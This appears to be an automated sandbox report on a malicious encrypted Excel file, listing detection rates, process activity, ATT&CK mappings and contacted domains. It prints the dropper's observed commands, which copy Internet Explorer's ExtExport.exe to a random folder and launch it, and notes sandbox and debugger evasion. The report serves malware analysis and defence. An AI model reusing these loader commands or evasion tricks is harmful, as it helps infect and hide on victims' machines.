Classification label: mal84.bank.expl.evad.winXLS@6/9@1/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{1744F764-0162-4D2E-BD56-CB64A386D406} - OProcSessId.dat

Jump to behavior

Source: document-47-2637.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: document-47-2637.xls	Virustotal: Detection: 26%
Source: document-47-2637.xls	Metadefender: Detection: 22%
Source: document-47-2637.xls	ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: extexport.pdbGCTL source: nnAzot.exe, 00000005.00000000.666770148.0000000001151000.00000020.00020000.sdmp, nnAzot.exe.2.dr
Source:	Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.2.dr

Source: document-47-2637.xls

Initial sample: OLE indicators vbamacros = False

Source: document-47-2637.xls

Initial sample: OLE indicators encrypted = True

Source: nnAzot.exe.2.dr

Static PE information: 0xA55DB0F5 [Fri Nov 30 21:19:49 2057 UTC]

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_01159865 push ecx; ret

5_2_01159878

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Jump to dropped file

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_01153367 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,

5_2_01153367

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: document-47-2637.xls

Stream path 'Workbook' entropy: 7.97723236264 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to compare user and computer (likely to detect sandboxes)

Show sources

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,

5_2_01156422

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_01156EB1 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

5_2_01156EB1

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_01159910 GetProcessHeap,HeapFree,

5_2_01159910

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Code function: 5_2_01159380 SetUnhandledExceptionFilter,		5_2_01159380
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Code function: 5_2_011596D1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		5_2_011596D1

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_01159583 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_01159583

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_01158F20 GetVersionExA,

5_2_01158F20

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting2	Application Shimming1	Process Injection2	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	Application Shimming1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery12	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Extra Window Memory Injection1	Process Injection2	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting2	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information11	LSA Secrets	System Information Discovery4	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Extra Window Memory Injection1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
document-47-2637.xls	26%	Virustotal		Browse
document-47-2637.xls	23%	Metadefender		Browse
document-47-2637.xls	15%	ReversingLabs	Document-Office.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	0%	Metadefender		Browse
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
webhub365.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Virustotal		Browse
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Virustotal		Browse
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://ovisualuiapp.azurewebsites.net/pbiagave/	0%	Avira URL Cloud	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
webhub365.com	198.244.146.96	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://login.microsoftonline.com/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://shell.suite.office.com:1443	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://autodiscover-s.outlook.com/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://cdn.entity.	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://powerlift.acompli.net	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://cortana.ai	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://api.aadrm.com/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://api.microsoftstream.com/api/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://cr.office.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://graph.ppe.windows.net	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://officeci.azurewebsites.net/api/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://store.office.cn/addinstemplate	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://globaldisco.crm.dynamics.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://store.officeppe.com/addinstemplate	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://web.microsoftstream.com/video/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://graph.windows.net	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://dataservice.o365filtering.com/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://ncus.contentsync.	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
